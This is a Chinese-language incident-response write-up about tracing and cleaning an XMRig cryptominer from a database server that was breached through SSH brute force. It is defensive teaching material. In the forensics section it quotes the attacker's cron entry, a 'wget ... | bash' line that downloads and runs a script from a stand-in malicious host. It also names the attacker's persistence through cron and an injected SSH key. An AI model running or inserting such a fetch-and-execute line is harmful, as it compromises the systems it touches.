在日常運維過程中，網絡安全事件時有發生，快速響應和精準溯源是保障業務穩定運行的關鍵。本文將通過一個實際案例，詳細解析從發現問題到溯源定位，再到最終解決的完整流程。

目錄

一、事件背景

二、事件發現

1. 監控告警觸發

2. 初步分析

三、溯源分析

1. 確定入侵源頭

四、處置與恢復

1. 立刻阻斷攻擊者控制

2. 清除惡意程序

3. 服務器加固

五、總結與經驗

---

一、事件背景

某互聯網公司運維團隊在日常巡檢時，發現一臺數據庫服務器（192.168.1.100）的CPU使用率異常升高，并伴隨大量未知進程占用系統資源，同時MySQL的查詢響應時間大幅延長。初步判斷可能存在異常入侵行為。

二、事件發現

1. 監控告警觸發

使用 Zabbix 監控發現：

• CPU 使用率持續超過 90%（長期穩定在 20% 左右）
• MySQL QPS/TPS 下降明顯，導致應用訪問變慢
• 服務器 磁盤 I/O 高異常

同時，Wazuh SIEM 平臺檢測到該服務器有異常 SSH 登錄記錄，涉及多個可疑 IP 地址。

2. 初步分析

（1）服務器資源消耗情況排查

top -c
ps aux --sort=-%cpu | head -10
ps aux --sort=-%mem | head -10

發現多個可疑進程（xmrig、kthreadd）在占用大量 CPU 資源，疑似挖礦木馬。

（2）網絡連接檢測

netstat -antp
ss -tunlp
lsof -i

發現多個可疑的遠程連接，連接至境外服務器 45.67.X.X:3333，疑似 C&C 服務器。

（3）日志分析

grep "Accepted password" /var/log/auth.log | awk '{print $1,$2,$3,$9,$11}'

發現多個異常 SSH 登錄記錄，部分 IP 源自境外，且短時間內進行了高頻登錄。

三、溯源分析

1. 確定入侵源頭

使用 HIDS（主機入侵檢測） 結合 日志分析，溯源入侵行為：

1. 攻擊者利用弱密碼暴力破解 SSH 賬戶（root/root123）
2. 登錄后下載并運行惡意挖礦程序（XMRig）
3. 修改 crontab 以保持長期控制

檢查 SSH 登錄記錄：

last -i | grep "root"

發現 root 賬戶從多個不明 IP 登錄。

檢查計劃任務：

crontab -l
cat /etc/crontab
ls -al /etc/cron.hourly/

發現惡意計劃任務，定期下載并運行木馬：

wget -qO- http://malicious-site.com/m.sh | bash

查找可疑進程執行路徑：

which xmrig
ls -l /usr/local/bin/xmrig
strings /usr/local/bin/xmrig

確認該進程為 挖礦程序，并且被設置為開機自啟。

四、處置與恢復

1. 立刻阻斷攻擊者控制

• 阻止惡意 IP：

iptables -A INPUT -s 45.67.X.X -j DROP
firewalld-cmd --permanent --add-rich-rule='rule family="ipv4" source address="45.67.X.X" reject'

• 禁用 root 遠程登錄：

sed -i 's/^PermitRootLogin yes/PermitRootLogin no/' /etc/ssh/sshd_config
systemctl restart sshd

• 修改所有賬戶密碼，并啟用 SSH 公鑰認證。

2. 清除惡意程序

• 殺掉惡意進程：

pkill -f xmrig
kill -9 $(pgrep -f xmrig)

• 刪除木馬文件：

rm -rf /usr/local/bin/xmrig /tmp/malicious.sh /etc/cron.hourly/malicious

• 檢查后門：

ls -al /root/.ssh/

發現 authorized_keys 中被植入了攻擊者的 SSH 公鑰，需刪除：

echo "" > /root/.ssh/authorized_keys

3. 服務器加固

• 開啟 fail2ban 防暴力破解：

apt install fail2ban -y
systemctl enable fail2ban

• 設置 SSH 端口為非默認端口：

sed -i 's/#Port 22/Port 2222/' /etc/ssh/sshd_config
systemctl restart sshd

• 關閉不必要的端口：

netstat -tulnp | grep LISTEN
systemctl disable unneeded-service

五、總結與經驗

1. SSH 賬戶密碼要設置足夠復雜，避免使用 root 直接登錄。
2. 部署 Wazuh、Fail2ban 等安全工具，實時監控入侵行為。
3. 定期檢查服務器 CPU、內存、I/O 指標，發現異常及時分析。
4. 建立應急響應預案，形成自動化處置流程。